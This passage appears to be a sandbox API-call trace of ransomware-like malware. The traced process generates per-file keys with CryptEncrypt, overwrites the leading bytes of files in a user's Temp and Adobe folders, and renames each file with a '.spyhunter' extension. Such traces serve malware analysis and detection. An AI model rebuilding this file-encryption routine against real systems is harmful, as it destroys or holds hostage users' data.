lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0139.399] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0139.399] WriteFile (in: hFile=0xb4, lpBuffer=0x25cf18c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf14c, lpOverlapped=0x0 | out: lpBuffer=0x25cf18c*, lpNumberOfBytesWritten=0x25cf14c*=0x4, lpOverlapped=0x0) returned 1 [0139.399] WriteFile (in: hFile=0xb4, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf14c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25cf14c*=0x30, lpOverlapped=0x0) returned 1 [0139.399] CloseHandle (hObject=0xb4) returned 1 [0139.399] GetProcessHeap () returned 0x2c0000 [0139.399] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f07c68 [0139.399] wnsprintfW (in: pszDest=0x2f07c68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\03J4UQW0\\desktop.ini.spyhunter") returned 120 [0139.399] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\03J4UQW0\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\03j4uqw0\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\03J4UQW0\\desktop.ini.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\03j4uqw0\\desktop.ini.spyhunter")) returned 1 [0139.400] GetProcessHeap () returned 0x2c0000 [0139.400] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f07c68 | out: hHeap=0x2c0000) returned 1 [0139.400] GetProcessHeap () returned 0x2c0000 [0139.400] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0139.400] GetProcessHeap () returned 0x2c0000 [0139.400] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc0050 | out: hHeap=0x2c0000) returned 1 [0139.400] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf188 | out: pbBuffer=0x25cf188) returned 1 [0139.400] GetProcessHeap () returned 0x2c0000 [0139.400] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0139.400] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25cf180*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25cf180*=0x30) returned 1 [0139.400] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\03J4UQW0\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0139.401] GetProcessHeap () returned 0x2c0000 [0139.401] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0139.401] GetProcessHeap () returned 0x2c0000 [0139.401] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2bde8 | out: hHeap=0x2c0000) returned 1 [0139.401] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf188 | out: pbBuffer=0x25cf188) returned 1 [0139.401] GetProcessHeap () returned 0x2c0000 [0139.401] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0139.401] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25cf180*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25cf180*=0x30) returned 1 [0139.401] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\03J4UQW0\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\03j4uqw0\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0139.401] GetProcessHeap () returned 0x2c0000 [0139.401] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0139.401] GetProcessHeap () returned 0x2c0000 [0139.401] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2bcd0 | out: hHeap=0x2c0000) returned 1 [0139.401] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf180 | out: pbBuffer=0x25cf180) returned 1 [0139.401] GetProcessHeap () returned 0x2c0000 [0139.401] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0139.401] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25cf178*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25cf178*=0x30) returned 1 [0139.401] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0139.402] GetProcessHeap () returned 0x2c0000 [0139.402] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0139.402] GetProcessHeap () returned 0x2c0000 [0139.402] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f61510 | out: hHeap=0x2c0000) returned 1 [0139.402] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf180 | out: pbBuffer=0x25cf180) returned 1 [0139.402] GetProcessHeap () returned 0x2c0000 [0139.402] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0139.402] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25cf178*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25cf178*=0x30) returned 1 [0139.402] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0139.402] GetProcessHeap () returned 0x2c0000 [0139.402] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0139.402] GetProcessHeap () returned 0x2c0000 [0139.402] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f45b28 | out: hHeap=0x2c0000) returned 1 [0139.402] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf178 | out: pbBuffer=0x25cf178) returned 1 [0139.402] GetProcessHeap () returned 0x2c0000 [0139.402] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0139.402] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25cf170*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25cf170*=0x30) returned 1 [0139.403] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0139.403] GetProcessHeap () returned 0x2c0000 [0139.403] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0139.403] GetProcessHeap () returned 0x2c0000 [0139.403] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f63408 | out: hHeap=0x2c0000) returned 1 [0139.403] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf178 | out: pbBuffer=0x25cf178) returned 1 [0139.403] GetProcessHeap () returned 0x2c0000 [0139.403] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0139.403] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25cf170*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25cf170*=0x30) returned 1 [0139.403] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0139.403] GetProcessHeap () returned 0x2c0000 [0139.403] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0139.403] GetProcessHeap () returned 0x2c0000 [0139.403] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2ed90 | out: hHeap=0x2c0000) returned 1 [0139.403] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf170 | out: pbBuffer=0x25cf170) returned 1 [0139.403] GetProcessHeap () returned 0x2c0000 [0139.403] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0139.403] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25cf168*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25cf168*=0x30) returned 1 [0139.404] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\tCJzWR0eQJeja1C.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\tcjzwr0eqjeja1c.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0139.404] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\tCJzWR0eQJeja1C.bmp") returned 72 [0139.404] StrStrW (lpFirst="tCJzWR0eQJeja1C.bmp", lpSrch=".txt") returned 0x0 [0139.404] GetProcessHeap () returned 0x2c0000 [0139.404] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0139.404] ReadFile (in: hFile=0xb4, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf12c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cf12c*=0x2800, lpOverlapped=0x0) returned 1 [0139.405] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0139.405] WriteFile (in: hFile=0xb4, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cf12c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cf12c*=0x2800, lpOverlapped=0x0) returned 1 [0139.405] GetProcessHeap () returned 0x2c0000 [0139.405] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0139.405] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0139.405] WriteFile (in: hFile=0xb4, lpBuffer=0x25cf16c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf12c, lpOverlapped=0x0 | out: lpBuffer=0x25cf16c*, lpNumberOfBytesWritten=0x25cf12c*=0x4, lpOverlapped=0x0) returned 1 [0139.405] WriteFile (in: hFile=0xb4, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf12c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25cf12c*=0x30, lpOverlapped=0x0) returned 1 [0139.405] CloseHandle (hObject=0xb4) returned 1 [0139.406] GetProcessHeap () returned 0x2c0000 [0139.406] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f07c68 [0139.406] wnsprintfW (in: pszDest=0x2f07c68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\tCJzWR0eQJeja1C.bmp.spyhunter") returned 82 [0139.406] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\tCJzWR0eQJeja1C.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\tcjzwr0eqjeja1c.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\tCJzWR0eQJeja1C.bmp.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\tcjzwr0eqjeja1c.bmp.spyhunter")) returned 1 [0139.407] GetProcessHeap () returned 0x2c0000 [0139.407] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f07c68 | out: hHeap=0x2c0000) returned 1 [0139.407] GetProcessHeap () returned 0x2c0000 [0139.407] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0139.407] GetProcessHeap () returned 0x2c0000 [0139.407] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb5118 | out: hHeap=0x2c0000) returned 1 [0139.407] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf170 | out: pbBuffer=0x25cf170) returned 1 [0139.407] GetProcessHeap () returned 0x2c0000 [0139.407] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0139.407] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25cf168*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25cf168*=0x30) returned 1 [0139.407] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\sxFe5_B0vV.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\sxfe5_b0vv.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0139.408] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\sxFe5_B0vV.odp") returned 67 [0139.408] StrStrW (lpFirst="sxFe5_B0vV.odp", lpSrch=".txt") returned 0x0 [0139.408] GetProcessHeap () returned 0x2c0000 [0139.408] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0139.408] ReadFile (in: hFile=0xb4, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf12c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cf12c*=0x2800, lpOverlapped=0x0) returned 1 [0139.408] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0139.409] WriteFile (in: hFile=0xb4, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cf12c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cf12c*=0x2800, lpOverlapped=0x0) returned 1 [0139.409] GetProcessHeap () returned 0x2c0000 [0139.409] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0139.409] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0139.409] WriteFile (in: hFile=0xb4, lpBuffer=0x25cf16c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf12c, lpOverlapped=0x0 | out: lpBuffer=0x25cf16c*, lpNumberOfBytesWritten=0x25cf12c*=0x4, lpOverlapped=0x0) returned 1 [0139.409] WriteFile (in: hFile=0xb4, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf12c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25cf12c*=0x30, lpOverlapped=0x0) returned 1 [0139.409] CloseHandle (hObject=0xb4) returned 1 [0139.409] GetProcessHeap () returned 0x2c0000 [0139.409] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f07c68 [0139.409] wnsprintfW (in: pszDest=0x2f07c68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\sxFe5_B0vV.odp.spyhunter") returned 77 [0139.409] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\sxFe5_B0vV.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\sxfe5_b0vv.odp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\sxFe5_B0vV.odp.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\sxfe5_b0vv.odp.spyhunter")) returned 1 [0139.410] GetProcessHeap () returned 0x2c0000 [0139.410] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f07c68 | out: hHeap=0x2c0000) returned 1 [0139.410] GetProcessHeap () returned 0x2c0000 [0139.410] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0139.410] GetProcessHeap () returned 0x2c0000 [0139.410] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e08a28 | out: hHeap=0x2c0000) returned 1 [0139.410] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf168 | out: pbBuffer=0x25cf168) returned 1 [0139.411] GetProcessHeap () returned 0x2c0000 [0139.411] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0139.411] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25cf160*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25cf160*=0x30) returned 1 [0139.411] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\SuNQe2I.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\sunqe2i.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0139.411] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\SuNQe2I.wav") returned 64 [0139.411] StrStrW (lpFirst="SuNQe2I.wav", lpSrch=".txt") returned 0x0 [0139.411] GetProcessHeap () returned 0x2c0000 [0139.411] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0139.411] ReadFile (in: hFile=0xb4, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf124, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cf124*=0x2800, lpOverlapped=0x0) returned 1 [0139.412] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0139.412] WriteFile (in: hFile=0xb4, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cf124, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cf124*=0x2800, lpOverlapped=0x0) returned 1 [0139.412] GetProcessHeap () returned 0x2c0000 [0139.412] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0139.412] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0139.412] WriteFile (in: hFile=0xb4, lpBuffer=0x25cf164*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf124, lpOverlapped=0x0 | out: lpBuffer=0x25cf164*, lpNumberOfBytesWritten=0x25cf124*=0x4, lpOverlapped=0x0) returned 1 [0139.413] WriteFile (in: hFile=0xb4, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf124, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25cf124*=0x30, lpOverlapped=0x0) returned 1 [0139.413] CloseHandle (hObject=0xb4) returned 1 [0139.413] GetProcessHeap () returned 0x2c0000 [0139.413] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f07c68 [0139.413] wnsprintfW (in: pszDest=0x2f07c68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\SuNQe2I.wav.spyhunter") returned 74 [0139.413] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\SuNQe2I.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\sunqe2i.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\SuNQe2I.wav.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\sunqe2i.wav.spyhunter")) returned 1 [0139.414] GetProcessHeap () returned 0x2c0000 [0139.414] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f07c68 | out: hHeap=0x2c0000) returned 1 [0139.414] GetProcessHeap () returned 0x2c0000 [0139.414] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0139.414] GetProcessHeap () returned 0x2c0000 [0139.414] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e08958 | out: hHeap=0x2c0000) returned 1 [0139.464] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf168 | out: pbBuffer=0x25cf168) returned 1 [0139.464] GetProcessHeap () returned 0x2c0000 [0139.464] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0139.465] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x25cf160*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x25cf160*=0x30) returned 1 [0139.465] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\ReaderMessages" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\acrobat\\10.0\\readermessages"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0139.479] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\ReaderMessages") returned 84 [0139.479] StrStrW (lpFirst="ReaderMessages", lpSrch=".txt") returned 0x0 [0139.479] GetProcessHeap () returned 0x2c0000 [0139.479] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0139.479] ReadFile (in: hFile=0xec, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf124, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25cf124*=0x2000, lpOverlapped=0x0) returned 1 [0139.646] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffe000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0139.646] WriteFile (in: hFile=0xec, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x25cf124, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25cf124*=0x2000, lpOverlapped=0x0) returned 1 [0139.646] GetProcessHeap () returned 0x2c0000 [0139.646] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0139.646] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0139.646] WriteFile (in: hFile=0xec, lpBuffer=0x25cf164*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf124, lpOverlapped=0x0 | out: lpBuffer=0x25cf164*, lpNumberOfBytesWritten=0x25cf124*=0x4, lpOverlapped=0x0) returned 1 [0139.646] WriteFile (in: hFile=0xec, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf124, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x25cf124*=0x30, lpOverlapped=0x0) returned 1 [0139.647] CloseHandle (hObject=0xec) returned 1 [0139.647] GetProcessHeap () returned 0x2c0000 [0139.647] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f6eda0 [0139.647] wnsprintfW (in: pszDest=0x2f6eda0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\ReaderMessages.spyhunter") returned 94 [0139.647] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\ReaderMessages" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\acrobat\\10.0\\readermessages"), 